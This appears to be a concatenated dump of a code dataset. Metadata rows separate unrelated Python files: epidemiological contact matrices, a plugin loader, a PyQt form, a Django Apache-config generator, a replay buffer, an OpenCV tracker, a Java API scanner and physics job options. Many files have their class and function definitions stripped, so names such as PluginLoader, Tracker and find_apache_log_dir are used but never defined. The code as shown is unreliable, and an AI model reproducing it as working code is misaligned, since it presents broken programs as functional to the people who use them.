[7.04119204e-003, 1.19412206e-001, 3.75016980e-002,
2.02193056e-001, 2.79822908e-001, 1.68610223e-001,
2.86939363e-002, 3.56961469e-002, 4.09234494e-002,
3.32290896e-002, 8.12074348e-003, 1.26152144e-002,
4.27869081e-003, 2.41737477e-003, 4.63116893e-004,
1.28597237e-003],
[1.41486320e-002, 3.86561429e-001, 2.55902236e-001,
1.69973534e-001, 4.98104010e-002, 8.98122446e-002,
7.95333394e-002, 5.19274611e-002, 5.46612930e-002,
2.64567137e-002, 2.03241595e-002, 2.96263220e-003,
5.42888613e-003, 4.47585970e-004, 1.65440335e-048,
3.11189454e-055],
[2.40945305e-002, 2.11030046e-001, 1.54767246e-001,
8.17929897e-002, 1.84061608e-002, 5.43009779e-002,
7.39351186e-002, 5.21677009e-002, 5.63267084e-002,
2.51807147e-002, 3.53972554e-003, 7.96646343e-003,
5.56929776e-004, 2.08530461e-003, 1.84428290e-123,
9.69555083e-067],
[7.81313905e-003, 1.14371898e-001, 9.09011945e-002,
3.80212104e-001, 8.54533192e-003, 2.62430162e-002,
2.51880009e-002, 3.22563508e-002, 6.73506045e-002,
2.24997143e-002, 2.39241043e-002, 6.50627191e-003,
5.50892674e-003, 4.78308850e-004, 4.81213215e-068,
2.40231425e-092],
[6.55265016e-002, 2.31163536e-001, 1.49970765e-001,
5.53563093e-001, 5.74032526e-003, 3.02865481e-002,
5.72506883e-002, 4.70559232e-002, 4.28736553e-002,
2.42614518e-002, 2.86665377e-002, 1.29570473e-002,
3.24362518e-003, 1.67930318e-003, 6.20916950e-134,
3.27297624e-072],
[1.72765646e-002, 3.43744913e-001, 4.30902785e-001,
4.74293073e-001, 5.39328187e-003, 1.44128740e-002,
3.95545363e-002, 3.73781860e-002, 4.56834488e-002,
5.92135906e-002, 2.91473801e-002, 1.54857502e-002,
4.53105390e-003, 8.87272668e-024, 1.23797452e-117,
5.64262349e-078],
[6.14363036e-002, 2.98367348e-001, 2.59092700e-001,
3.00800812e-001, 5.92454596e-003, 5.26458862e-002,
2.02188672e-002, 3.27897605e-002, 4.07753741e-002,
2.83422407e-002, 2.43657809e-002, 2.73993226e-002,
8.87990718e-003, 1.13279180e-031, 7.81960493e-004,
7.62467510e-004],
[3.63695643e-002, 5.96870355e-002, 3.05072624e-002,
1.45523978e-001, 1.26062984e-002, 1.69458169e-003,
1.55127292e-002, 4.22097670e-002, 9.21792425e-003,
1.42200652e-002, 1.10967529e-002, 5.77020348e-003,
2.04474044e-002, 1.11075734e-002, 4.42271199e-067,
2.12068625e-037],
[1.67937029e-003, 2.72971001e-002, 1.05886266e-002,
7.61087735e-032, 1.97191559e-003, 1.92885006e-003,
1.24343737e-002, 5.39297787e-003, 5.41684968e-003,
8.63502071e-003, 1.94554498e-003, 1.49082274e-002,
8.11781100e-003, 1.74395489e-002, 1.11239023e-002,
3.45693088e-126],
[1.28088348e-028, 5.11065200e-026, 1.93019797e-040,
7.60476035e-003, 2.63586947e-022, 1.69749024e-024,
1.25875005e-026, 7.62109877e-003, 7.84979948e-003,
2.11516023e-002, 3.52117832e-002, 2.14360383e-002,
7.73902109e-003, 8.01328325e-003, 7.91285055e-003,
2.13825814e-002],
[2.81655586e-094, 2.11305187e-002, 8.46562506e-042,
2.12592841e-002, 4.89802057e-036, 7.59232387e-003,
9.77247001e-069, 2.23108239e-060, 1.43715978e-048,
8.56015694e-060, 4.69469043e-042, 1.59822047e-046,
2.20978550e-083, 8.85861277e-107, 1.02042815e-080,
6.61413913e-113]])
Mu_work = np.array([[0.00000000e+000, 0.00000000e+000, 0.00000000e+000,
0.00000000e+000, 0.00000000e+000, 0.00000000e+000,
0.00000000e+000, 0.00000000e+000, 0.00000000e+000,
0.00000000e+000, 0.00000000e+000, 0.00000000e+000,
0.00000000e+000, 8.20604524e-092, 1.20585150e-005,
3.16436834e-125],
[0.00000000e+000, 1.16840561e-003, 9.90713236e-072,
4.42646396e-059, 2.91874286e-006, 9.98773031e-003,
2.58779981e-002, 5.66104376e-003, 2.12699812e-002,
5.72117462e-003, 1.48212306e-003, 1.23926126e-003,
1.28212945e-056, 1.34955578e-005, 7.64591325e-079,
2.38392073e-065],
[0.00000000e+000, 2.56552144e-003, 1.12756182e-001,
2.40351143e-002, 2.62981485e-002, 7.56512432e-003,
6.19587609e-002, 1.73269871e-002, 5.87405128e-002,
3.26749742e-002, 1.24709193e-002, 2.93054408e-008,
3.71596993e-017, 2.79780317e-053, 4.95800770e-006,
3.77718083e-102],
[0.00000000e+000, 1.07213881e-002, 4.28390448e-002,
7.22769090e-001, 5.93479736e-001, 3.39341952e-001,
3.17013715e-001, 2.89168861e-001, 3.11143180e-001,
2.34889238e-001, 1.32953769e-001, 6.01944097e-002,
1.47306181e-002, 8.34699602e-006, 2.85972822e-006,
1.88926122e-031],
[0.00000000e+000, 9.14252587e-003, 5.74508682e-002,
4.00000235e-001, 7.93386618e-001, 7.55975146e-001,
6.32277283e-001, 6.83601459e-001, 4.98506972e-001,
3.82309992e-001, 2.81363576e-001, 1.23338103e-001,
4.15708021e-002, 9.86113407e-006, 1.32609387e-005,
3.74318048e-006],
[0.00000000e+000, 1.04243481e-002, 7.34587492e-002,
3.49556755e-001, 7.50680101e-001, 1.25683393e+000,
9.01245714e-001, 8.63446835e-001, 7.70443641e-001,
5.17237071e-001, 4.09810981e-001, 1.80645400e-001,
5.51284783e-002, 1.60674627e-005, 1.01182608e-005,
3.01442534e-006],
[0.00000000e+000, 1.65842404e-002, 8.34076781e-002,
1.89301935e-001, 5.21246906e-001, 8.54460001e-001,
1.12054931e+000, 9.64310078e-001, 8.34675180e-001,
6.52534012e-001, 3.79383514e-001, 2.11198205e-001,
5.17285688e-002, 1.63795563e-005, 4.10100851e-006,
3.49478980e-006],
[0.00000000e+000, 1.11666639e-002, 5.03319748e-002,
3.70510313e-001, 4.24294782e-001, 7.87535547e-001,
8.45085693e-001, 1.14590365e+000, 1.07673077e+000,
7.13492115e-001, 5.00740004e-001, 1.90102207e-001,
3.59740115e-002, 1.22988530e-005, 9.13512833e-006,
6.02097416e-006],
[0.00000000e+000, 6.07792440e-003, 5.49337607e-002,
2.23499535e-001, 4.82353827e-001, 7.52291991e-001,
8.89187601e-001, 9.33765370e-001, 1.10492283e+000,
8.50124391e-001, 5.88941528e-001, 1.94947085e-001,
5.09477228e-002, 1.43626161e-005, 1.02721567e-005,
1.29503893e-005],
[0.00000000e+000, 3.31622551e-003, 7.01829848e-002,
2.67512972e-001, 3.14796392e-001, 5.41516885e-001,
6.95769048e-001, 7.50620518e-001, 7.50038547e-001,
7.00954088e-001, 4.35197983e-001, 2.11283335e-001,
3.88576200e-002, 1.62810370e-005, 1.08243610e-005,
6.09172339e-006],
[0.00000000e+000, 4.39576425e-004, 7.17737968e-002,
1.89254612e-001, 2.47832532e-001, 5.16027731e-001,
6.02783971e-001, 6.15949277e-001, 8.05581107e-001,
7.44063535e-001, 5.44855374e-001, 2.52198706e-001,
4.39235685e-002, 1.18079721e-005, 1.18226645e-005,
1.01613165e-005],
[0.00000000e+000, 4.91737561e-003, 1.08686672e-001,
1.24987806e-001, 1.64110983e-001, 3.00118829e-001,
4.18159745e-001, 3.86897613e-001, 4.77718241e-001,
3.60854250e-001, 3.22466456e-001, 1.92516925e-001,
4.07209694e-002, 1.34978304e-005, 6.58739925e-006,
6.65716756e-006],
[0.00000000e+000, 6.35447018e-004, 3.96329620e-002,
1.83072502e-002, 7.04596701e-002, 1.24861117e-001,
1.37834574e-001, 1.59845720e-001, 1.66933479e-001,
1.56084857e-001, 1.14949158e-001, 8.46570798e-002,
1.50879843e-002, 2.03019580e-005, 8.26102156e-006,
1.48398182e-005],
[7.60299521e-006, 3.36326754e-006, 7.64855296e-006,
2.27621532e-005, 3.14933351e-005, 7.89308410e-005,
7.24212842e-005, 2.91748203e-005, 6.61873732e-005,
5.95693238e-005, 7.70713500e-005, 5.30687748e-005,
4.66030117e-005, 1.41633235e-005, 2.49066205e-005,
1.19109038e-005],
[5.78863840e-055, 7.88785149e-042, 2.54830412e-006,
2.60648191e-005, 1.68036205e-005, 2.12446739e-005,
3.57267603e-005, 4.02377033e-005, 3.56401935e-005,
3.09769252e-005, 2.13053382e-005, 4.49709414e-005,
2.61368373e-005, 1.68266203e-005, 1.66514322e-005,
2.60822813e-005],
[2.35721271e-141, 9.06871674e-097, 1.18637122e-089,
9.39934076e-022, 4.66000452e-005, 4.69664011e-005,
4.69316082e-005, 8.42184044e-005, 2.77788168e-005,
1.03294378e-005, 1.06803618e-005, 7.26341826e-075,
1.10073971e-065, 1.02831671e-005, 5.16902994e-049,
8.28040509e-043]])
Mu_other = np.array([[0.95537734, 0.46860132, 0.27110607, 0.19447667, 0.32135073,
0.48782072, 0.54963024, 0.42195593, 0.27152038, 0.17864251,
0.20155642, 0.16358271, 0.1040159 , 0.0874149 , 0.05129938,
0.02153823],
[0.51023519, 2.17757364, 0.9022516 , 0.24304235, 0.20119518,
0.39689588, 0.47242431, 0.46949918, 0.37741651, 0.16843746,
0.12590504, 0.12682331, 0.11282247, 0.08222718, 0.03648526,
0.02404257],
[0.18585796, 1.11958124, 4.47729443, 0.67959759, 0.43936317,
0.36934142, 0.41566744, 0.44467286, 0.48797422, 0.28795385,
0.17659191, 0.10674831, 0.07175567, 0.07249261, 0.04815305,
0.03697862],
[0.09854482, 0.3514869 , 1.84902386, 5.38491613, 1.27425161,
0.59242579, 0.36578735, 0.39181798, 0.38131832, 0.31501028,
0.13275648, 0.06408612, 0.04499218, 0.04000664, 0.02232326,
0.01322698],
[0.13674436, 0.1973461 , 0.33264088, 2.08016394, 3.28810184,
1.29198125, 0.74642201, 0.44357051, 0.32781391, 0.35511243,
0.20132011, 0.12961 , 0.04994553, 0.03748657, 0.03841073,
0.02700581],
[0.23495203, 0.13839031, 0.14085679, 0.5347385 , 1.46021275,
1.85222022, 1.02681162, 0.61513602, 0.39086271, 0.32871844,
0.25938947, 0.13520412, 0.05101963, 0.03714278, 0.02177751,
0.00979745],
[0.23139098, 0.18634831, 0.32002214, 0.2477269 , 0.64111274,
0.93691022, 1.14560725, 0.73176025, 0.43760432, 0.31057135,
0.29406937, 0.20632155, 0.09044896, 0.06448983, 0.03041877,
0.02522842],
[0.18786196, 0.25090485, 0.21366969, 0.15358412, 0.35761286,
0.62390736, 0.76125666, 0.82975354, 0.54980593, 0.32778339,
0.20858991, 0.1607099 , 0.13218526, 0.09042909, 0.04990491,
0.01762718],
[0.12220241, 0.17968132, 0.31826246, 0.19846971, 0.34823183,
0.41563737, 0.55930999, 0.54070187, 0.5573184 , 0.31526474,
0.20194048, 0.09234293, 0.08377534, 0.05819374, 0.0414762 ,
0.01563101],
[0.03429527, 0.06388018, 0.09407867, 0.17418896, 0.23404519,
0.28879108, 0.34528852, 0.34507961, 0.31461973, 0.29954426,
0.21759668, 0.09684718, 0.06596679, 0.04274337, 0.0356891 ,
0.02459849],
[0.05092152, 0.10829561, 0.13898902, 0.2005828 , 0.35807132,
0.45181815, 0.32281821, 0.28014803, 0.30125545, 0.31260137,
0.22923948, 0.17657382, 0.10276889, 0.05555467, 0.03430327,
0.02064256],
[0.06739051, 0.06795035, 0.0826437 , 0.09522087, 0.23309189,
0.39055444, 0.39458465, 0.29290532, 0.27204846, 0.17810118,
0.24399007, 0.22146653, 0.13732849, 0.07585801, 0.03938794,
0.0190908 ],
[0.04337917, 0.05375367, 0.05230119, 0.08066901, 0.16619572,
0.25423056, 0.25580913, 0.27430323, 0.22478799, 0.16909017,
0.14284879, 0.17211604, 0.14336033, 0.10344522, 0.06797049,
0.02546014],
[0.04080687, 0.06113728, 0.04392062, 0.04488748, 0.12808591,
0.19886058, 0.24542711, 0.19678011, 0.17800136, 0.13147441,
0.13564091, 0.14280335, 0.12969805, 0.11181631, 0.05550193,
0.02956066],
[0.01432324, 0.03441212, 0.05604694, 0.10154456, 0.09204 ,
0.13341443, 0.13396901, 0.16682638, 0.18562675, 0.1299677 ,
0.09922375, 0.09634331, 0.15184583, 0.13541738, 0.1169359 ,
0.03805293],
[0.01972631, 0.02274412, 0.03797545, 0.02036785, 0.04357298,
0.05783639, 0.10706321, 0.07688271, 0.06969759, 0.08029393,
0.05466604, 0.05129046, 0.04648653, 0.06132882, 0.05004289,
0.03030569]])
def generate_reduced_matrices(age_sep, Ni):
'''
Receives the age_separation and populations to generate the average contact
matrices, returns a (4, len(age_sep)+1, len(age_sep)+1) with the 4 partial
contact matrices: house, school, work and other
Ni is the population for each population component (16 5-years age groups)
'''
nMat = len(age_sep) + 1
Ms = np.empty((4, nMat, nMat))
age_indexes = list()
age_indexes.append(np.flatnonzero(ages_Mu_min <= age_sep[0]))
for i in range(1, len(age_sep)):
age_indexes.append(np.flatnonzero((ages_Mu_min > age_sep[i-1]) *
(ages_Mu_min <= age_sep[i])))
age_indexes.append(np.flatnonzero(ages_Mu_min > age_sep[-1]))
for i in range(nMat):
Nia = Ni[age_indexes[i]]
Na = Nia.sum()
for j in range(nMat):
Ms[0,i,j] = (Nia * ((Mu_house[age_indexes[i]][:,age_indexes[j]]).sum(axis=1))).sum()/Na
Ms[1,i,j] = (Nia * ((Mu_school[age_indexes[i]][:,age_indexes[j]]).sum(axis=1))).sum()/Na
Ms[2,i,j] = (Nia * ((Mu_work[age_indexes[i]][:,age_indexes[j]]).sum(axis=1))).sum()/Na
Ms[3,i,j] = (Nia * ((Mu_other[age_indexes[i]][:,age_indexes[j]]).sum(axis=1))).sum()/Na
return Ms
#ts, X = call_ODE(X0, tmax, betas, param, tcorte=tcorte)
#plt.plot(ts, X[:,:2], '.-')
| 48.936267 | 152 | 0.593135 |
a1fac0722dfead6d7d06eddcce884f4ba1c9a684 | 2,447 | py | Python | src/fogml/generators/knn_code_generator.py | bkulawska/FogML | fdcb2f0bf759f1994a6f788e9e60dd2d3b65919a | [
"Apache-2.0"
] | null | null | null | src/fogml/generators/knn_code_generator.py | bkulawska/FogML | fdcb2f0bf759f1994a6f788e9e60dd2d3b65919a | [
"Apache-2.0"
] | null | null | null | src/fogml/generators/knn_code_generator.py | bkulawska/FogML | fdcb2f0bf759f1994a6f788e9e60dd2d3b65919a | [
"Apache-2.0"
] | null | null | null | import numpy as np
import os
from sklearn.neighbors import KNeighborsClassifier
from .base_generator import BaseGenerator
| 34.957143 | 91 | 0.585206 |
a1fbd1b0e28715e9bf42d61fcecc21a928f44f08 | 8,719 | py | Python | modules/plugins/__init__.py | sungkomp/sambro | 4618d785d03424d122206d88d9ebfb6971486e2c | [
"MIT"
] | 5 | 2017-02-03T16:29:43.000Z | 2018-12-17T15:43:36.000Z | modules/plugins/__init__.py | sungkomp/sambro | 4618d785d03424d122206d88d9ebfb6971486e2c | [
"MIT"
] | 84 | 2016-04-11T12:47:42.000Z | 2019-05-27T03:46:09.000Z | modules/plugins/__init__.py | sungkomp/sambro | 4618d785d03424d122206d88d9ebfb6971486e2c | [
"MIT"
] | 3 | 2016-11-29T15:27:18.000Z | 2019-10-15T02:46:45.000Z | # -*- coding: utf-8 -*-
import os
import sys
from gluon import current
from gluon.storage import Storage
__all__ = ("PluginLoader",
)
# Name of the plugin directory in modules
PLUGINS = "plugins"
# Module names to ignore when scanning for plugins
IGNORE = ("skeleton", "__init__")
# Name of the setup function in plugins
SETUP = "setup"
# Name of the variable that contains the version info in plugins
VERSION = "__version__"
# =============================================================================
# =============================================================================
# Do a full scan when reloading the module (=when the thread starts)
PluginLoader.detect(reset_all=True)
# =============================================================================
| 31.02847 | 83 | 0.513476 |
a1fbde784a20640d80d64437aa8dd036428fff1c | 15,105 | py | Python | CCMtask/ccm.py | yyFFans/DemoPractises | e0e08413efc598489401c8370f4c7762b3493851 | [
"MIT"
] | null | null | null | CCMtask/ccm.py | yyFFans/DemoPractises | e0e08413efc598489401c8370f4c7762b3493851 | [
"MIT"
] | null | null | null | CCMtask/ccm.py | yyFFans/DemoPractises | e0e08413efc598489401c8370f4c7762b3493851 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ccm.ui'
#
# Created by: PyQt5 UI code generator 5.13.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
| 57 | 112 | 0.732539 |
a1fe7d59bcfb1477b00dec04a015c0d87e23fbf2 | 11,758 | py | Python | openstack_dashboard/management/commands/make_web_conf.py | wilk/horizon | bdf7e692227367a928325acdd31088971d3c4ff4 | [
"Apache-2.0"
] | 1 | 2019-08-07T08:46:03.000Z | 2019-08-07T08:46:03.000Z | openstack_dashboard/management/commands/make_web_conf.py | wilk/horizon | bdf7e692227367a928325acdd31088971d3c4ff4 | [
"Apache-2.0"
] | 5 | 2019-08-14T06:46:03.000Z | 2021-12-13T20:01:25.000Z | openstack_dashboard/management/commands/make_web_conf.py | wilk/horizon | bdf7e692227367a928325acdd31088971d3c4ff4 | [
"Apache-2.0"
] | 2 | 2020-03-15T01:24:15.000Z | 2020-07-22T20:34:26.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import multiprocessing
import os
import re
import socket
import subprocess
import sys
import warnings
import six
from django.conf import settings
from django.core.management import base
from django import template
# Suppress DeprecationWarnings which clutter the output to the point of
# rendering it unreadable.
warnings.simplefilter('ignore')
cmd_name = __name__.split('.')[-1]
CURDIR = os.path.realpath(os.path.dirname(__file__))
PROJECT_PATH = os.path.realpath(os.path.join(CURDIR, '../..'))
STATIC_PATH = os.path.realpath(os.path.join(PROJECT_PATH, '../static'))
# Known apache regular expression to retrieve it's version
APACHE_VERSION_REG = r'Apache/(?P<version>[\d.]*)'
# Known apache commands to retrieve it's version
APACHE2_VERSION_CMDS = (
(('/usr/sbin/apache2ctl', '-V'), APACHE_VERSION_REG),
(('/usr/sbin/apache2', '-v'), APACHE_VERSION_REG),
)
# Known apache log directory locations
APACHE_LOG_DIRS = (
'/var/log/httpd', # RHEL / Red Hat / CentOS / Fedora Linux
'/var/log/apache2', # Debian / Ubuntu Linux
)
# Default log directory
DEFAULT_LOG_DIR = '/var/log'
def _getattr(obj, name, default):
"""Like getattr but return `default` if None or False.
By default, getattr(obj, name, default) returns default only if
attr does not exist, here, we return `default` even if attr evaluates to
None or False.
"""
value = getattr(obj, name, default)
if value:
return value
else:
return default
context = template.Context({
'DJANGO_SETTINGS_MODULE': os.environ['DJANGO_SETTINGS_MODULE'],
'HOSTNAME': socket.getfqdn(),
'PROJECT_PATH': os.path.realpath(
_getattr(settings, 'ROOT_PATH', PROJECT_PATH)),
'STATIC_PATH': os.path.realpath(
_getattr(settings, 'STATIC_ROOT', STATIC_PATH)),
'SSLCERT': '/etc/pki/tls/certs/ca.crt',
'SSLKEY': '/etc/pki/tls/private/ca.key',
'CACERT': None,
'PROCESSES': multiprocessing.cpu_count() + 1,
})
context['PROJECT_ROOT'] = os.path.dirname(context['PROJECT_PATH'])
context['PROJECT_DIR_NAME'] = os.path.basename(
context['PROJECT_PATH'].split(context['PROJECT_ROOT'])[1])
context['PROJECT_NAME'] = context['PROJECT_DIR_NAME']
context['DEFAULT_WSGI_FILE'] = os.path.join(
context['PROJECT_PATH'], 'wsgi.py')
context['WSGI_FILE'] = os.path.join(
context['PROJECT_PATH'], 'horizon_wsgi.py')
VHOSTNAME = context['HOSTNAME'].split('.')
VHOSTNAME[0] = context['PROJECT_NAME']
context['VHOSTNAME'] = '.'.join(VHOSTNAME)
if len(VHOSTNAME) > 1:
context['DOMAINNAME'] = '.'.join(VHOSTNAME[1:])
else:
context['DOMAINNAME'] = 'openstack.org'
context['ADMIN'] = 'webmaster@%s' % context['DOMAINNAME']
context['ACTIVATE_THIS'] = None
virtualenv = os.environ.get('VIRTUAL_ENV')
if virtualenv:
activate_this = os.path.join(
virtualenv, 'bin/activate_this.py')
if os.path.exists(activate_this):
context['ACTIVATE_THIS'] = activate_this
# Try to detect apache's version
# We fallback on 2.4.
context['APACHE2_VERSION'] = 2.4
APACHE2_VERSION = None
for cmd in APACHE2_VERSION_CMDS:
if os.path.exists(cmd[0][0]):
try:
reg = re.compile(cmd[1])
output = subprocess.check_output(cmd[0], stderr=subprocess.STDOUT)
if isinstance(output, six.binary_type):
output = output.decode()
res = reg.search(output)
if res:
APACHE2_VERSION = res.group('version')
break
except subprocess.CalledProcessError:
pass
if APACHE2_VERSION:
ver_nums = APACHE2_VERSION.split('.')
if len(ver_nums) >= 2:
try:
context['APACHE2_VERSION'] = float('.'.join(ver_nums[:2]))
except ValueError:
pass
context['LOGDIR'] = find_apache_log_dir()
| 35.203593 | 78 | 0.58743 |
a1fe9f599cc2d428cbcc60b9598dd9359a4d7d5f | 1,107 | py | Python | codes/convergence_elasticity_advection/meshManager.py | adRenaud/research | 2f0062a1800d7a17577bbfc2393b084253d567f4 | [
"MIT"
] | 1 | 2021-06-18T14:52:03.000Z | 2021-06-18T14:52:03.000Z | codes/convergence_elasticity/meshManager.py | adRenaud/research | 2f0062a1800d7a17577bbfc2393b084253d567f4 | [
"MIT"
] | 1 | 2019-01-07T13:11:11.000Z | 2019-01-07T13:11:11.000Z | codes/convergence_elasticity_advection/meshManager.py | adRenaud/research | 2f0062a1800d7a17577bbfc2393b084253d567f4 | [
"MIT"
] | null | null | null | # !/usr/bin/python
import numpy as np
import math as m
| 22.14 | 76 | 0.532972 |
a1fedb42ea7da198208259c1cf29d8481af7dd8f | 3,202 | py | Python | exarl/agents/agent_vault/_prioritized_replay.py | schr476/EXARL | 7f4596bd8b3d7960aaf52bc677ceac4f37029834 | [
"BSD-3-Clause"
] | 2 | 2022-02-03T20:33:17.000Z | 2022-02-10T22:43:32.000Z | exarl/agents/agent_vault/_prioritized_replay.py | schr476/EXARL | 7f4596bd8b3d7960aaf52bc677ceac4f37029834 | [
"BSD-3-Clause"
] | 40 | 2022-01-25T18:03:12.000Z | 2022-03-31T21:43:32.000Z | exarl/agents/agent_vault/_prioritized_replay.py | schr476/EXARL | 7f4596bd8b3d7960aaf52bc677ceac4f37029834 | [
"BSD-3-Clause"
] | 1 | 2022-02-10T14:33:30.000Z | 2022-02-10T14:33:30.000Z | import random
import numpy as np
import tensorflow as tf
from collections import deque
| 32.673469 | 119 | 0.628045 |
b8009f8fd07294eb10166608312734f91397abd7 | 5,722 | py | Python | rmtt_tracker/scripts/roi_tracker.py | cavayangtao/rmtt_ros | e89383510373e9ff9c8bb5c43ae719ca575ef2f5 | [
"BSD-3-Clause"
] | null | null | null | rmtt_tracker/scripts/roi_tracker.py | cavayangtao/rmtt_ros | e89383510373e9ff9c8bb5c43ae719ca575ef2f5 | [
"BSD-3-Clause"
] | null | null | null | rmtt_tracker/scripts/roi_tracker.py | cavayangtao/rmtt_ros | e89383510373e9ff9c8bb5c43ae719ca575ef2f5 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python3
# coding=utf-8
# pip install opencv_contrib_python
# tianbot_mini/image_raw/compressed
# roi
import sys
import os
import rospy
import sensor_msgs.msg
from cv_bridge import CvBridge
import cv2
import numpy as np
from sensor_msgs.msg import RegionOfInterest as ROI
from sensor_msgs.msg import CompressedImage
br = CvBridge()
def compressed_detect_and_draw(compressed_imgmsg):
global br,gFrame,gCapStatus,getFrame,loopGetFrame
if ((getFrame == True) or (loopGetFrame == True)):
gFrame = br.compressed_imgmsg_to_cv2(compressed_imgmsg, "bgr8")
gCapStatus = True
getFrame = True
gFrame = np.zeros((640,640,3), np.uint8)
gCapStatus = False
getFrame = True
loopGetFrame = False
if __name__ == '__main__':
rospy.init_node('tbm_tld_tracker_node')
rospy.Subscriber("/image_raw", sensor_msgs.msg.CompressedImage, compressed_detect_and_draw)
pub = rospy.Publisher("roi",ROI,queue_size=10)
tld_roi = ROI()
# rate = rospy.Rate(10)
# rate.sleep()
#
print(" n y ROI")
while True:
_key = cv2.waitKey(0) & 0xFF
if(_key == ord('n')):
# gCapStatus,gFrame = gVideoDevice.read()
getFrame = True
if(_key == ord('y')):
break
cv2.imshow("Pick frame",gFrame)
# region of interest
cv2.destroyWindow("Pick frame")
gROI = cv2.selectROI("ROI frame",gFrame,False)
if (not gROI):
print("")
quit()
#
gTracker = Tracker(tracker_type="TLD")
gTracker.initWorking(gFrame,gROI)
#
while not rospy.is_shutdown():
# gCapStatus, gFrame = gVideoDevice.read()
loopGetFrame = True
if(gCapStatus):
#
_item = gTracker.track(gFrame)
cv2.imshow("Track result",_item.getFrame())
if _item.getMessage():
#
print(_item.getMessage())
_key = cv2.waitKey(1) & 0xFF
if (_key == ord('q')) | (_key == 27):
break
if (_key == ord('r')) :
# ROI
print("ROI")
gTracker = Tracker(tracker_type="TLD")
gTracker.initWorking(gFrame, gROI)
else:
print("")
quit()
| 31.097826 | 113 | 0.54072 |
b80101fcb0f7ec764004534f9989b58dc2d327bf | 4,236 | py | Python | api-scanner/method_analysis_job.py | ybqdren/Python-JavaAPI-Scanner | 69e2de07c95a8edf526dfb4b8eb14deec5693061 | [
"Apache-2.0"
] | null | null | null | api-scanner/method_analysis_job.py | ybqdren/Python-JavaAPI-Scanner | 69e2de07c95a8edf526dfb4b8eb14deec5693061 | [
"Apache-2.0"
] | null | null | null | api-scanner/method_analysis_job.py | ybqdren/Python-JavaAPI-Scanner | 69e2de07c95a8edf526dfb4b8eb14deec5693061 | [
"Apache-2.0"
] | null | null | null | # -*- coding:utf-8 -*-
# @Author: ZhaoWen <withzhaowen@126.com>
# @Date: 2021/1/2
# @GiteePath: https://gitee.com/openeuler2020/team-1186152014
from method_analysis_utils.scanner import get_scanner,token_type
import os
import logging.config
from method_analysis_utils.complier import get_complier
#
logging.config.fileConfig('logging.conf')
logger = logging.getLogger()
def comfig_complier():
'''
complier
:return:
'''
c = get_complier()
return c
def config_scanner():
'''
scanner
:return: a value named s,type is scanner
'''
s = get_scanner()
#
s.method_list = []
s.left_single = 0
s.right_single = 0
# 1. method_name_token [a-zA-Z]+
# 2. param_token ^[(][a-zA-Z0-9.png$\s,<A-Z>]+[)] -> (Properties prop1,Properties prop2)
# 3. return_type_token |||void| )
# 4. end_token { ->
#
access_token = token_type("access_token","default|public|protected|private")
#
key_token = token_type("key_token","final|abstract|static|synchronized")
#
next_token = token_type("next_token","[//]+")
#
next_method_token = token_type("next_method_token","([a-zA-Z]+)\).*{")
# token
imp_token = token_type("imp_token","(.*)([a-zA-Z]+)(\s){0,}(\(.*\))[a-zA-Z\s]{0,}{")
#
invalid_token = token_type("invalid_token",".*")
#
interface_token = token_type("interface_token","\s(interface)\s|\s(@interface)\s")
#
class_token = token_type("class_token","(class)\s(.*){(.*)")
#
package_token = token_type("package_token","^package")
# {
left_single_token = token_type("left_single_token","(.*){(.*)")
# }
right_single_token = token_type("right_Single_token","(.*)}(.*)")
# {}
all_single_token = token_type("all_single_token","(.*)}(.*){(.*)")
token_type_dict = {"access_token":access_token,
"key_token":key_token,
"next_token":next_token,
"next_method_token":next_method_token,
"imp_token":imp_token,
"invalid_token":invalid_token,
"interface_token":interface_token,
"class_token":class_token,
"package_token":package_token,
"left_single_token":left_single_token,
"right_single_token":right_single_token,
"all_single_token":all_single_token
}
s.set_token_type(token_type_dict)
return s
def job_start(path):
'''
API
:return: APIAPI
'''
s = config_scanner()
isClass = False
###### #######
s.read_file(path)
method_list = s.find_method()
# method_list.pop(-1)TrueFalse
if method_list.pop(-1):
isClass = True
for m in method_list:
logging.info(m)
logger.info("(" + str(len(method_list)) + ") ")
else:
logging.info("")
s.close_file()
###########################
#### ####
c = comfig_complier()
#
public_list = []
unpublic_list = []
info_list = []
c.complier_start()
for i in method_list:
if type(i) != dict:
if c.complier_method(i):
public_list.append(i)
logger.info("public -> "+i)
else:
unpublic_list.append(i)
logger.info("unpublic -> "+i)
else:
try:
info_list.append(i["package"].replace(";", "").strip())
info_list.append(i["class"].replace("{", "").strip())
except KeyError as e:
logging.info(str(type(e))+"......"+str(e.args))
c.complier_close()
###########################
# | API | API |
return [info_list,public_list,unpublic_list,isClass] | 28.24 | 96 | 0.581681 |
b8014951415d289b10583d9f4dc51aea80536fbd | 4,905 | py | Python | ksteta3pi/Consideredbkg/MC_12_11134011_MagUp.py | Williams224/davinci-scripts | 730642d2ff13543eca4073a4ce0932631195de56 | [
"MIT"
] | null | null | null | ksteta3pi/Consideredbkg/MC_12_11134011_MagUp.py | Williams224/davinci-scripts | 730642d2ff13543eca4073a4ce0932631195de56 | [
"MIT"
] | null | null | null | ksteta3pi/Consideredbkg/MC_12_11134011_MagUp.py | Williams224/davinci-scripts | 730642d2ff13543eca4073a4ce0932631195de56 | [
"MIT"
] | null | null | null | #-- GAUDI jobOptions generated on Mon Jul 20 10:20:49 2015
#-- Contains event types :
#-- 11134011 - 42 files - 900254 events - 251.92 GBytes
#-- Extra information about the data processing phases:
#-- Processing Pass Step-125836
#-- StepId : 125836
#-- StepName : Stripping20-NoPrescalingFlagged for Sim08 - Implicit merging.
#-- ApplicationName : DaVinci
#-- ApplicationVersion : v32r2p1
#-- OptionFiles : $APPCONFIGOPTS/DaVinci/DV-Stripping20-Stripping-MC-NoPrescaling.py;$APPCONFIGOPTS/DaVinci/DataType-2012.py;$APPCONFIGOPTS/DaVinci/InputType-DST.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r164
#-- Visible : Y
#-- Processing Pass Step-127969
#-- StepId : 127969
